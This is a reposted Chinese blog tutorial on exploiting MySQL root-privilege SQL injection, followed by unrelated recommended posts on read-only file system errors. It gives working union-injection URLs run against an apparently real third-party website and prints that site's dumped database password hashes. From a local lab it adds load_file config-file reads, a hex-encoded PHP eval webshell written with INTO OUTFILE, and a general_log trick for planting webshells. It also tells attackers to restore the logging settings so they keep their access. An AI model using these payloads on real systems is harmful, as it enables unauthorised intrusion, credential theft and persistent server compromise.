read-only file system怎么改权限_【Mysql Root 权限下】注入利用技巧

最新推荐文章于 2023-12-29 08:56:33 发布
最新推荐文章于 2023-12-29 08:56:33 发布
阅读量306 收藏
点赞数
文章标签: read-only file system怎么改权限 redistemplate注入为null shell root权限 授权函php还是提示没权限 由于权限不足而无法读取配置文件

前言须知

虽说是 root 权限,但这并不意味着,你就可以在目标系统中为所欲为,假如目标的 root 被降了权,或者你想写 shell 的目标网站目录都不可写,这时,即使你是 root 权限,能干的事儿也一样非常的有限,当我们在实战中遇到一个 mysql root 权限的注入点时,想干或者暂时能干的事情无非就下面这些,接下来,会针对每种方法做详细演示

查出目标数据库root的密码然后尝试外连,前提是得目标允许root用户远程连才行 [grant允许]

尝试读取目标网站目录中的各类敏感密码文件,搜集各种账号密码再配合别的漏洞进去

尝试直接往目标网站目录中写webshell,如果当前数据库用户对目标网站目录不可写?[权限被控住了]

udf 提权,如果目标的 mysql 服务是以一个系统伪用户权限起来的[通常都是这样],提权效果自然也就没了

首先,先说最简单的,查出目标数据库的root密码然后尝试外连,本地用于实例演示的root权限注入点如下

http://charade.futami.co.jp/topix/detail.php?tid=264

9a33b6749c076db4b1a96214a6de81b2.png

先确定是否真的存在注入,条件为真时页面返回正常

http://charade.futami.co.jp/topix/detail.php?tid=264 and 112=112 -- -

bee114188a118717aa689ae38992d7d1.png

条件为假时页面返回异常,说明注入存在

http://charade.futami.co.jp/topix/detail.php?tid=264 and 112=1112 -- -

fc5ab4bb3f729ab2232fe2870cef6431.png

曝出当前表的字段总个数,这次我们就不用order by了, 因为有时候,可能order by 不太好使,大家可以用null来代替遍历,从下面我们发现,当字段个数为6时页面返回异常

http://charade.futami.co.jp/topix/detail.php?tid=264+UNION+ALL+SELECT+null,null,null,null,null,null  --+-

a580b311657467be6fbc99e7b681e98f.png

当字段个数为5时,页面正常返回,此时,说明当前表的字段个数总共为5个,有了准确的字段个数,直接曝数据即可

http://charade.futami.co.jp/topix/detail.php?tid=264+UNION+ALL+SELECT+null,null,null,null,null  --+-

faa3e2942dc54ced5a59f8eb0376661f.png

知道了字段个数还不够,我们还需要知道准确的数据显示位,其实也很简单,逐个位的遍历就好了

http://charade.futami.co.jp/topix/detail.php?tid=-264+UNION+ALL+SELECT+null,'k','l',null,null  --+-

e20008ebec6d39faa64f023a34c7c942.png

搜集数据库信息,查权限,查版本[在前面我们已经说过,5.5.x和5.6.x的系统用户表的密码字段名是不一样的]

http://charade.futami.co.jp/topix/detail.php?tid=-264+UNION+ALL+SELECT+null,user(),version(),null,null  --+-

9e072801c332d2a8af6672460ec5987e.png

我们发现当前数据库用户为root,版本是5.1.x 既然是root那就简单了,由于库名,表名,字段名都是已知的,直接查数据即可,很快我们就直接拿到了目标的root密码hash,很遗憾的是,目标的数据库端口并没有对外开放,而且hash暂时还没解出来,所以就不能连上去给大家看实际效果了,实在抱歉

http://charade.futami.co.jp/topix/detail.php?tid=-264+UNION+ALL+SELECT+null,concat_ws(' | ',User,Password),'l',null,null from mysql.user limit 0,1  --+-

cc1f70fd5f3c09920e87e237f6e162fa.png

8f613d240506af5f6ba3df74e01f8cc9.png

最终,等到数据库用户级密码hash如下:

piwik_user   *A90E9645441C1748C7FC28054F71B40C81C7C3BA

root  *811B86916C32F73EBB956D1A1F32A5A0E801FC5B

直接查 root 密码的说完了,现在我们再来介绍第二种方法,读取目标网站的各类敏感配置文件,因为上面那个站,懒得去曝它网站的物理路径[关键大家真正理解就行,思路更重要],然后就寻思着,要不再找一个实例站点来演示,不过 root 权限的实在是不太好找,找了很久都没有找到针对性的站,所以读取文件,我们这里暂时就先用本地环境[pentestlab]来演示了,之前的那些流程我就不废话了,直接来看重点吧

在mysql中一般我们都会用load_file来读取文件,注意,这里读取文件所继承的权限是数据库服务用户的权限,并非web用户的权限,因为你脚本的sql语句最终是在数据库中执行的,也就是说,如果数据库服务用户对你想读的文件所在的目录没有读权限,也一样是读不出来的,不过一般情况下都可以读出来,因为读一般都不会被控住,这里的文件路径,记得顺手hex下,主要是为了避免单引号引起sql语句出错,下面的hex数据对应的明文其实是‘/var/www/classes/db.php‘

http://192.168.1.132/cat.php?id=-1+UNION+ALL+SELECT+1,load_file(0x2f7661722f7777772f636c61737365732f64622e706870),3,4 -- -

a13d9eed4133a2103a2195c85595f566.png

这样就可以直接把目标的数据库账号密码给读出来了,当然啦,实战中,只要能读到账号密码的地方你都可以尝试去读,即使目标数据库不允许外连,也把这个账号密码先搜集过来再说

68937c808f4f70236a07d77e7a85b558.png

说完读,我们再来说写的问题,像这种情况一般都是在你已经拿到目标的网站物理路径[至于怎么曝出目标的物理路径,可以去我的博客里找找,里面有一篇里面详细提到了这个,话说回来,如果页面的错误处理非常的到位,基本是不可能曝出来的],而注入点恰巧又是root权限,这时你就可以直接尝试往目标的网站目录里面写webshell,但还是有个前提,你当前执行sql写的系统用户身份[一般都是web]对那个目录一定要有写权限才行,如果目录权限是root属主,root属组,目录是755这么一个权限,那也基本是写不进去的,从下面我们看到,典型的权限不够

http://192.168.1.132/cat.php?id=-1+UNION+ALL+SELECT+1,0x3c3f70687020406576616c28245f504f53545b6b6c696f6e5d293f3e,3,4 into outfile '/var/www/webshell.php'-- -

ed26ecc31c8c73b5eb9d9ddf38cf23ea.png

c9b8674d08bf85f06dabda85f3d491e5.png409aee9ef9be1f3c4bd212533c6b8f13.png

不信,我们可以去服务器上看看文件是不是存在,里面是不是有我们刚刚写进去的一句话

92978846e7223476f789d4a463735c46.png

尝试访问 shell,正常执行,altman 也正常连上

2c89f21374a6a52276926dab857045e3.pngada3c391f2f01a8d622583ba7bcabed2.png

最后,我们再回过头来仔细观察下这个 webshell 的权限,mysql 属主,属组,这也正好印证了我之前所说的,因为你的 sql 语句最终是在数据库中执行的,所以,它映射的权限自然也是数据服务用户的权限,能不能做你想做的操作关键还要看这个用户在系统中所映射的权限到底有多大

dc753e6e86d43cdd6ef96950eed01892.png

在上半部分,我们详细说明了 mysql 在 root 权限下如何读写文件,开启外连,这次我们就来简单说明如何通过 mysql 的 log 功能写 shell 以及如何利用 udf 执行系统命令

日志写,利用核心

利用 mysql 的 general log 功能来写 shell,其实,核心很简单,当你把这个开关开启以后,它自动把所有执行过的 sql 语句都记录到一个指定的文件里去,具体怎么利用呢,其实也很简单,由于 mysql 的 root 权限是可以随意修改 mysql 内部配置,也就是说我完全可以把原来默认的日志文件位置给替换掉,然后重新指向到目标网站目录中,这样我再随便去 select 个一句话,这个一句话自然也就直接进到你 set 的那个目标网站目录里的日志文件了,另外,这儿还有一个很重要的前提,就是你在数据库中 set 到的那个目录,对你当前数据库服务用户一定要是可写的,不然同样写不进去,具体操作,如下

1

2

3

4

5

6

7

mysql> show variables like ‘%general%’;

mysql> set global general_log = on;

mysql> set global general_log_file = ‘/var/www/loveshell.php’;

mysql> select ‘<?php @eval($_POST[klion])?>’;

$ sudo cat /var/www/loveshell.php

mysql> set global general_log_file = ‘/var/run/mysqld/mysqld.log’;

mysql> set global general_log = off;

上来先看下目标数据库默认的日志存放路径在哪儿,顺手记录下来,等会儿干完活儿还要恢复回来

c69ff8f0f1e09ac6f94e0ec9fd4c1683.png

开启 mysql log 功能,把 log 文件指向到目标的网站目录中,你自己实战时,可能会发现通常都是 set 不进去的,其实原因很明显,大多数都由于当前的 mysql 服务用户对网站目录没有写权限,具体效果如下,说到这里,相比大家也应该很清楚了,其实你要想把这种方法利用成功,可能需要目标 web 服务本身有很高的系统权限,比如,像 appserv 之类的集成环境,在 windows 中默认就是 system 权限,很容易就拿到 shell 了,如果就是个数据库服务用户权限,而且这个用户对网站目录还不能写,那基本也是很难利用上的

1a9e831e66f2e8438c061dd4b3d663e2.png

为了继续我们的演示效果,这里我就先手动把网站目录给下其它人可写的权限

583c61a5446c2044de0b082c48075490.png

这时候我们再次尝试set,就可以顺利set进去了,这时直接select个一句话,实际中最好select个免杀一句话

dc9b09498ef601011c9f2bab84e84671.png

然后再到我们刚刚 set 的日志文件中,看看我们的一句话到底有没有被记录,从下图可知,我们的一句话已经被正常记录了日志文件中

6019125249192c87a176ef85f2431654.png

尝试访问我们的一句话,看到下面的返回就则说明我们的一句话已经被正常执行,实际中可能并不会这么轻松,如果目标访问量比较大,短时间 log 文件可能会比较大,在用菜刀或者别的连一句话的时候不免会有些卡

962373e15f06fbc14024881950bbff66.png

最后,一定要记得把我们刚刚修改的配置再顺手恢复回来,活儿一定要干净,实际渗透中,最好养成这样的习惯,不然,辛苦弄到的权限也许就因为自己的粗心掉了,岂不尴尬

f86363c0658f0e67a0a830f5ffe77195.png

343d533ba5809a11b09ea74bd869b770.png

你可能喜欢

SQLServer注入技巧

绕过WAF继续SQL注入常用方法

SQL注入access数据库【一】

来源:lsh4ck's Blog,转自:黑白之道

52519df5e6730c46a007d6564ce3a923.gif

一篇文章由浅入深了解MSSQL注入

mysql密码忘记了怎么办

https://jingyan.baidu.com/article/870c6fc3244d96b03fe4bec3.html

weixin_39886929
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux mysql 只读模式_Linux文件目录变只读(Read-only file system)导致mysql启动失败
weixin_34755947的博客
01-19 792
背景今天准备调试一个很久打开的项目时,页面死活出数据。后来发现数据库停止,故用命令启动,查看运行状态,发现以下异常。Jun 15 15:30:58 sccprocduat10 systemd[1]: Started LSB: start and stop MySQL.Jun 15 15:30:59 sccprocduat10 mysqld[52940]: rm: cannot remove ‘...
Linux 出现 Read-only file system 怎么处理
weixin_42599908的博客
12-29 8101
如果你的 Linux 系统出现 "Read-only file system" 的错误消息,这意味着你的文件系统被设置为只读,无法进行写操作。这可能是由于磁盘空间不足、文件系统损坏或磁盘 I/O 错误导致的。 要解决这个问题,你需要进入系统的安全模式或单用户模式,这样你就可以使用 root 用户权限来修复文件系统。 具体步骤如下: 重启你的计算机,在启动界面按下适当的按键(通常是 F2、F10 ...
Linux下出现Read-only file system的解决办法
小马哥博客
04-11 1万+
亲测有效!
Linux出现Read-only file system错误解决方法
weixin_47980221的博客
04-12 3406
执行命令时遇到如下错误 这个问题是文件系统受损导致得,fstab文件未正确配置 解决方法: df -hT  #查看一下分区及挂载信息 fsck -a /dev/sda3  -a :检查文件系统,有异常便自动修复 执行完毕之后重启服务器 reboot 进入服务器,vim修fstab文件时发现无法,只有只读权限 以读写模式重新挂载 mount -o remount,rw / 问题解决 ~...
Read-only file system的解决方法
zheng573419235的博客
02-19 4万+
今天通过修/etc/fstab文件来实现自动挂载时, 提示Read-only file system,然后什么都修不了, 执行此条命令 # : mount -o remount rw / 问题顺利解决,现在可以修文件了 转至:https://www.cnblogs.com/Anker/p/3229247.html ...
c#简单实现mysql连接和文件的写入写出
05-27
在C#编程环境中,与MySQL数据库进行交互是常见的任务,特别是在开发桌面应用或者Web应用时。本教程将详细讲解如何使用C#实现与MySQL数据库的连接,并进行文件的读写操作,这对于初学者掌握数据库开发和文件操作技能...
mysql 主从复制环境搭建
09-28
5. 到 regedit 中,修服务中二进制配置文件,HKEY_LOCAL_MACHINE-->SYSTEM-->CurrentControlSet-->Services 找到刚才创建的 MySQL2,将 ImagePath 修成":拷贝到路径指定的文件及路径。 步骤三:配置主从复制 ...
CentOS+Nginx+PHP+Mysql配置和WEB服务器安全配置方案.pdf
07-13
- **增大上传文件大小**:通过修`upload_max_filesize`来增加允许上传的最大文件大小。 5. **优化MySQL** - **调整表高速缓存**:在`my.cnf`中,增加`table_cache`值,以缓存更多的表,提高访问速度。但需注意...
php.ini-development
05-08
The syntax of the file is extremely simple. Whitespace and lines ; beginning with a semicolon are silently ignored (as you probably guessed). ; Section headers (e.g. [Foo]) are also silently ignored,...
java解析excel到mysql代码存档.txt
10-21
Connection conn = DriverManager.getConnection("jdbc:mysql://127.0.0.1:3306/exam", "root", "aaaaaa"); PreparedStatement prep = conn.prepareStatement("insert into t_exam_question values (null,null,...
Mac OS删除文件时报Read-only file system错误解决办法
培根芝士的专栏
04-09 1万+
在删除文件时报了Read-only file system的错误 解决方案: mount -o remount rw /
linux系统变为只读,提示Read-only file system的解决办法
最新发布
m0_38048955的博客
12-29 7950
如何解决
mac mysql read only_mac Read-Only filesystem
weixin_32652003的博客
02-17 128
在这次mac升级系统后,我发现我的/data目录消失了,于是我执行了命令:mkdir /data结果发现居然提示Read-Only filesystem,即使加上了sudo也用在我查阅相关资料后找到了解决办法(关闭SIP,然后输入sudo mount -uw /,创建文件夹添加权限,最后启用SIP),具体步骤如下:1、重启mac,按住Command+R,等到系统进入安全模式。2、选择一个账户,...
生产环境问题实战(二)-Read-only file system引发的MySQL宕机
fly_zhaohy的博客
03-07 3632
问题描述: 业务反应服务不可用,查看后台日志发现MySQL有异常,进入MySQL数据库服务器,发现MySQL进程已经宕掉了,赶紧重启MySQL,启动失败,Read-only file system. 问题分析: 通过运维解决了这个问题,然后重启虚拟机及相关服务,最终问题得到解决,以下是运维给出的问题排查以及解决办法: 解决方案: ...
php-fpm报错Unable to create the PID file (/usr/local/php/var/run/php-fpm.pid).: Read-only file system
梦启未来
06-26 2802
ERROR:Unable to create the PID file (/usr/local/php/var/run/php-fpm.pid).: Read-only file system ERROR: FPM initialization failed 这个错误是因为权限创建php-fpm.pid文件,导致启动不起来 深层原因现在也搞不懂,倒是在外网找到一个方法 在编译安装php的时候,有个过程,就是把php-fpm写入系统服务里面 cd /usr/lib/systemd/syste.
Linux下出现Read-only file system解决办法
热门推荐
一只立志于养老婆的程序猿
11-04 8万+
问题描述 涉及到修/保存条目等需要写磁盘操作的命令都无法使用(如tar、cp、mv、rm、chmod、chown、wget下载等指令),总是提示Read-only file system,也就是说系统是只读的,什么也写不了。 解决方案 查看/etc/fstab文件,在其中发现这样的一样记录(注意errors=remount-ro段),如下: /dev/sda1 / ext3 errors=remount-ro 0 1 这种情况通常都是由于系统发现磁盘硬件故障或文件系统中文件被损坏之后而采取的保护机制导致的
PHP报错Warning
meiyouhai的博客
03-27 177
错误信息:PHP Warning: mkdir()…Permission denied 出现该报错的原因是因为:权限不足无法创建文件夹。 解决办法: 修父级目录权限为0777 命令行: chmod -R 777 问价夹名称
Mac PHP编译安装扩展遇到的问题
骑在大象背上的人生
01-28 688
最近,在Mac下安装PHP扩展,遇到一些问题记录一下。本人安装的是mongodb扩展,对于该扩展直接去PECL下载并解压就好了,其他扩展类似,就不再这里展开了。主要说一下,编译的时候遇到的问题。 问题记录: 1)./configure的时候 could not find php.h 2) Operation not permitted 3) ln: /usr/include: Read-only file system 问题说明: 其实以上问题主要是由于MacOs SIP(System integrit
root@DESKTOP-0CU081I:/# sudo mysqld --default_authentication_plugin=mysql_native_password mysqld: [Warning] World-writable config file '/etc/mysql/my.cnf' is ignored. 2023-06-05T10:01:47.364773Z 0 [Warning] [MY-010918] [Server] 'default_authentication_plugin' is deprecated and will be removed in a future release. Please use authentication_policy instead. 2023-06-05T10:01:47.364802Z 0 [System] [MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.33-0ubuntu0.20.04.2) starting as process 392 2023-06-05T10:01:47.366321Z 0 [ERROR] [MY-010123] [Server] Fatal error: Please read "Security" section of the manual to find out how to run mysqld as root! 2023-06-05T10:01:47.366408Z 0 [ERROR] [MY-010119] [Server] Aborting 2023-06-05T10:01:47.366507Z 0 [System] [MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.33-0ubuntu0.20.04.2) (Ubuntu).
06-06
2. 该命令使用了 `sudo` 来以 root 权限运行 `mysqld`,但是 MySQL 官方强烈建议不要使用 root 用户来运行 `mysqld`。 3. 出现了一个致命错误,提示需要阅读 MySQL 手册中的 "Security" 部分来了解如何以 root 用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值